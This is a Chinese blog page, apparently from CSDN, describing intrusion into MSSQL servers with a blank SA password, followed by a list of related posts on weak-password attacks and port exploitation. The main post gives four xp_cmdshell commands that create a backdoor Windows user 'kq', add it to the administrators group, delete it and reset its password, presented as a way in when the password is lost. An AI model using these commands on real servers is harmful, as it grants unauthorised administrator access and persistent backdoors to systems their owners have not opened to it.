MSSQL SA 空口令入侵漏洞

最新推荐文章于 2025-01-21 12:57:26 发布

原创最新推荐文章于 2025-01-21 12:57:26 发布 · 1.4k 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#数据库服务器 #user

博客介绍了客户数据库服务器因遗失密码无法进入时的处理方法，包括添加用户作为后门、将用户添加到系统管理员组、删除用户以及修改用户密码等操作，通过执行相关命令来实现。

解决问题: 客户数据库服务器,因遗失密码而无法进入时,可考虑通过该方法进行入侵.

1.添加用户 kq 密码 123 为后门.
EXEC master..xp_cmdshell 'net user kq 123 /add'

2.将用户 kq 添加到系统管理员组中.
EXEC master..xp_cmdshell 'net localgroup administrators kq /add'

3.删除用户 kq
EXEC master..xp_cmdshell 'net user kq /delete'

4.修改用户密码(123456)
EXEC master..xp_cmdshell 'net user kq 123456'

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

skywebnet

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

云原生攻防5（Kubernetes常见攻击方式、挖矿应急响应、获取token、端口2379、6443、10250、30372、K8s常用端口探测、ConfigMap）

墨痕诉清风的博客

06-06

267

随着越来越多企业开始上云的步伐，在攻防演练碰到云相关的场景有：公有云、私有云、混合云、虚拟化集群。以往渗透是从外网突破-> 提权 -> 权限维持 -> 信息收集 -> 横向移动 -> 循环收集信息获得重要目标系统。随着业务上云以及虚拟化技术的引入改变了这种格局，也打开了新的入侵路径。1. 通过虚拟机攻击云管理平台，利用管理平台控制所有机器2. 通过容器进行逃逸，从而控制宿主机以及横向渗透到K8s Master节点控制其上所有容器。

sql1433端口msf、hydra弱口令爆破，获得了sql-server的权限，通过几种方式能够提权

weixin_64655821的博客

08-31

5128

如果得到了1433端口，进行弱口令爆破，百度下1433端口，弱口令爆破的方式，kali 中msf hydra弱口令爆破。总结获得弱口令，获得了sql-server的权限，通过几种方式能够提权。

参与评论您还未登录，请先登录后发表或查看评论

mssql弱口令检测

xmas

05-10

1307

import socket import binascii def check(host,port,username,password,timeout): try: socket.setdefaulttimeout(timeout) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.conne

快速抓肉机（sa空口令篇）(转)

08-17

558

快速抓肉机（sa空口令篇）(转)[@more@]快速抓肉机（sa空口令篇）不要以为这个世界没有sa空口令的机器了，或许作为一个服务器的很少，但是现在很多软件都是使用sql数据库的，而软件的设计者（公司）一般都设置sql密码是空口...

最新microsoft sql server sa权限入侵方法

11-08

最新microsoft sql server sa权限入侵方法

SA口令

congaishang0622的博客

09-09

406

登录系统管理提示输入SQL Server口令分析SA口令问题 SA口令为空或口令比较简单很可能会被病毒或木马功击，建议用户设置SA密码，操作步骤：系统管理àAdmin身份登录à系...

利用mssql弱口令的注入以及防御（安全）

全欣的专栏

03-24

4890

原文地址：http://www.hackmvp.com/donghua/sort0114/16287.html 第一部分：猜解口令和入侵大家都知道1433是mssql数据库的默认端口，也都知道sa是mssql数据库的默认的管理员帐号，这个端口的入侵以前讲过许多，网上也有很多这方面的资料，下面我就根据我个人在【新世纪网安】的学习来总结一下首先，要想通过1433端口进入载有ms

web入侵二之弱口令攻击及其他

热门推荐

jiangliuzheng的专栏

12-30

1万+

一、什么是弱口令就是说由常用数字、字母、字符等组合成的，容易被别人通过简单及平常的思维方式就能猜到的密码，利用弱口令结合计算机系统等漏洞可以做到入侵的事半功倍的效果二、共享入侵--IPC$ IPC$是共享“命名管道”资源，它是为了让进程间通信而开放的命令管道，可以通过验证用户名和密码获取相应的权限，在远程管理计算机和查看计算机的共享资源是使用，利用IPC$,攻击者甚至可

常见端口对应的漏洞利用方式

聚鼎安全

12-14

2656

目录常见端口对应的漏洞利用方式文件共享服务端口远程连接服务端口Web应用服务端口数据库服务端口邮件服务端口网络参加协议端口特殊服务端口常见端口对应的漏洞利用方式端口服务入侵方式 21 ftp/tftp/vsftpd文件传输协议爆破/嗅探/溢出/后门 22 ssh远程连接爆破/openssh漏洞 23 Telnet远程连接爆破/嗅探/弱口令 25 SMTP邮件服务邮件伪造 53 DNS域名解析系统域传送/劫持/缓存投毒/欺骗 67/68 dhcp服务劫持

信息收集及漏洞利用--安全（四）

qq_43371350的博客

04-03

3329

信息收集收集目标web服务器的网络信息、系统信息、组织信息网络信息包括：域名、TCP/UDP的端口、网络协议、防火墙、访问控制策略等系统信息包括：系统标识、站点目录、系统架构、路由表、测试/临时文件组织信息包括：员工信息、邮箱/电话、公司地址、组织网站、组织背景等 whois信息收集注册人、电话、邮箱、dns、地址等 whois 信息 whois.chinaz.com , wwww...

各端口可能出现的漏洞

qq_49015005的博客

06-30

1219

tcp 110 POP3 可尝试爆破,嗅探 tcp 111,2049 NFS 权限配置不当 tcp 137,139,445 Samba 可尝试爆破以及smb自身的各种远程执行类漏洞利用,如,ms08-067,ms17-010,嗅探等 tcp 143 IMAP 可尝试爆破 udp 161 SNMP 爆破默认团队字符串,搜集目标内网信息 tcp 389 LDAP ldap注入,允许匿名访问,弱口令 tcp 512,513,514 Linux rexec 可爆破,rlogin登陆 tcp 873 Rsync 匿名

mssql弱口令扫描工具+字典

01-19

mssql弱口令扫描工具+字典。

SA空口令入侵到3389终结完整编

chinawwc的专栏

05-15

4353

工具:WINNTAutoAttack自动攻击器(扫漏洞)SQLTOOLS(SA空口令连接器)RAMDIN影子3.0中文版(远程控制程序)RADMIN注册码:08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23SC.e

【漏洞与预防】MSSQL数据库弱口令漏洞预防

最新发布

solarset的博客

01-21

1278

工具名称md5sha1Ncrack。

MSSQL SA弱口令***那些事

weixin_34293902的博客

07-04

590

本文技术交流与学习之用，请勿非法使用，产生任何后果本人概不负责。一、如何找到SA弱口令计算机1、扫描获得1433端口开放的计算机端口扫描器和专门的SQL扫描器很多，笔者经过大量的测试，推荐使用ssport(如图1)这款扫描器进行扫描，尽管有些基于SYN方式的扫描器扫描速度很快，但误报和漏扫情况比较多，而且对网络速度要求比较高，而ssport可以根据扫描计算机的硬件...

MSSQL sa 弱口令提权基础知识学习

wjy397的专栏

06-29

3117

https://bbs.ichunqiu.com/thread-23312-1-1.html 1. “扩展存储过程”中的 xp_cmdshell Microsoft SQLServer是一个C/S模式的强大的关系型数据库管理系统，应用领域十分广泛，从网站后台数据库到一些MIS(管理信息系统)到处都可以看到它的身影。网络安全中经常利用SqlServer SA弱

sql弱口令入侵

飞雨飞羽飞鱼

08-12

5856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <div id="content" class= "content mod-cs-content text-content clearfix"> sql弱口令入侵

遇上mysql root 密码为空和frontpage extention漏洞(原创）

liswa 电脑备忘录

12-05

1477

以前只在网上看到过介绍，想不到无意中被我碰上了。事因我很少使用扫描的，所以遇到的漏洞不多。这次刚好心血来潮扫了一个C段，就被我碰上了。是windows主机，但是安装了mysql，X-Scan报告了一些信息，其中有两个引起了我的注意。一种是mysql的root密码为空，一种是frontpage的extention漏洞。1、对于mysql中root密码为空：使用mysql的连接器连接

SA弱口令带来的安全隐患

weixin_34413802的博客

03-21

361

文章出自www.51cto.com 存在Microsoft SQL Server SA弱口令漏洞的计算机一直是网络***者青睐的对象之一，通过这个漏洞，可以轻易的得到服务器的管理权限，从而威胁网络及数据的安全。作为网络管理员，我们可不能不闻不问，一定要弄清楚这其中的起因、经过和结果，才能有的放矢，做到更为有效的防范，下面我就详细的向大家介绍一下。 Microsoft ...

C#开发的多服务弱口令检测工具V1.0介绍

弱口令漏洞是一个非常普遍且严重的问题，因为它们是许多数据泄露和安全事件的入口点。最后，提到的“压缩包子文件的文件名称列表”中包含了两个文件：readme.txt和超级弱口令检查工具V1.0 Beta12 20171208。readme...

MSSQL SA 空口令 入侵漏洞

MSSQL SA 空口令入侵漏洞